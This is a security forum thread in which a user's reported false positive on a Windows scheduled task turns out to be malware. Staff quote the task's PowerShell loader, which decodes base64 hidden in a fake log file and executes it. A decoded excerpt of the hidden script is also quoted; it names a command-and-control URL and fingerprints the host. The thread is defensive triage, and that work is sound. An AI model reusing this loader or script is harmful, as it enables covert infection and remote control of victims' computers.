Peca21 Posted May 14, 2022 ID:1515602 Share Posted May 14, 2022 For me this looks like a normal task and vbs script that's built into windows. The VBS script itself is not detected, but the task is. Uploaded the text file and some pictures falsePos.txt Link to post Share on other sites More sharing options...
Peca21 Posted May 14, 2022 Author ID:1515604 Share Posted May 14, 2022 NOTE: This task has been created on 12th of May 2022, which is the day I updated windows and also had to reinstall .NET to fix the broken update. Link to post Share on other sites More sharing options...
Staff shadowwar Posted May 15, 2022 Staff ID:1515613 Share Posted May 15, 2022 (edited) Can you please attach a copy of the task located here: Trojan.VBS.TaskExecution, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\NetService\Network\NetServices It may have to be zipped in order to attach. i have disabled the rule for now till further investigation of the task. There is a malware that is currently misuing the vbs script using a task with the syncappserver.vbs by microsoft to decode itself and run. It hides itself in legit text files/logs and uses this vbs to decode the malware portion out of the txt file. A copy of the legit task would help us better to write a rule not to hit it. Thanks. Edited May 15, 2022 by shadowwar Link to post Share on other sites More sharing options...
Staff shadowwar Posted May 15, 2022 Staff ID:1515663 Share Posted May 15, 2022 I really dont think this is a fp. I am reenabling the rule till i get a copy of the task that shows it is. Thanks for reporting. Link to post Share on other sites More sharing options...
Peca21 Posted May 15, 2022 Author ID:1515670 Share Posted May 15, 2022 Here is the task file from C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network I uploaded it as a ZIP file because it wont let me upload files without extension NetServices.zip Link to post Share on other sites More sharing options...
Staff shadowwar Posted May 15, 2022 Staff ID:1515671 Share Posted May 15, 2022 This is not a fp . <Arguments>"n; $a=Get-Content "C:\Windows\logs\system-logs.txt" | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block</Arguments> </Exec> </Actions> can you zip and attach this file also? C:\Windows\logs\system-logs.txt 1 Link to post Share on other sites More sharing options...
Peca21 Posted May 15, 2022 Author ID:1515686 Share Posted May 15, 2022 Here system-logs.zip Link to post Share on other sites More sharing options...
David H. Lipman Posted May 15, 2022 ID:1515687 Share Posted May 15, 2022 There is a Base64 encoded script embedded in that, what is supposed to be just a LOG file. Excerpt: Spoiler scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path; $OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString(); $EndPointURL = "http://api.private-chatting.com/connect"; $__Version__ = "M_35"; [string]$WorkerEnHandle = [Guid]::NewGuid().ToString(); [System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle); function XF3a8JO3r5r8G([string] $str) { return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%") } function WMI([string] $class, [string] $value) { $val = $null; $results = (Get-WmiObject -Class $class) ; foreach ($item in $results) { $val = $item[$value]; break; } if ($val -eq $null) { $val = [Guid]::NewGuid().ToString(); } return $val; } function Get-HWID() { return (WMI 'win32_logicaldisk' "VolumeSerialNumber") } function ik9hXhN11R() { return (WMI 'Win32_OperatingSystem' "Caption") } function P9TEtu77LCNtD() { return (WMI 'Win32_Processor' "AddressWidth") } function av_enabled([uint32]$state) { [byte[]] $bytes = [System.BitConverter]::GetBytes($state); if (($bytes[1] -eq 0x10) -or ($bytes[1] -eq 0x11)) { return "Enabled"; } elseif (($bytes[1] -eq 0x00) -or ($bytes[1] -eq 0x01) -or ($bytes[1] -eq 0x20) -or ($bytes[1] -eq 0x21)) { return "Disabled"; } return "Unknown"; } Link to post Share on other sites More sharing options...
Peca21 Posted May 15, 2022 Author ID:1515694 Share Posted May 15, 2022 Well I guess it's not a false positive, deleting this stuff right now Link to post Share on other sites More sharing options...
Porthos Posted May 15, 2022 ID:1515695 Share Posted May 15, 2022 @Peca21 It needs more work do not do it on your own. Please follow the instructions in this topic then create a new topic in our malware removal area by clicking here and a malware removal specialist will guide you in checking and cleaning your system of any threats. Link to post Share on other sites More sharing options...
Staff shadowwar Posted May 16, 2022 Staff ID:1515726 Share Posted May 16, 2022 Also would help if you have any idea where you may have gotten infected from. Thanks! Link to post Share on other sites More sharing options...
Peca21 Posted May 16, 2022 Author ID:1515754 Share Posted May 16, 2022 9 hours ago, shadowwar said: Also would help if you have any idea where you may have gotten infected from. Thanks! https://www.bitcoinabuse.com/reports/bc1qn6ype8u5kgj672mvsez9wz9wt9wk22tzd5vprp Link to post Share on other sites More sharing options...
Staff shadowwar Posted May 16, 2022 Staff ID:1515762 Share Posted May 16, 2022 Thanks! Link to post Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now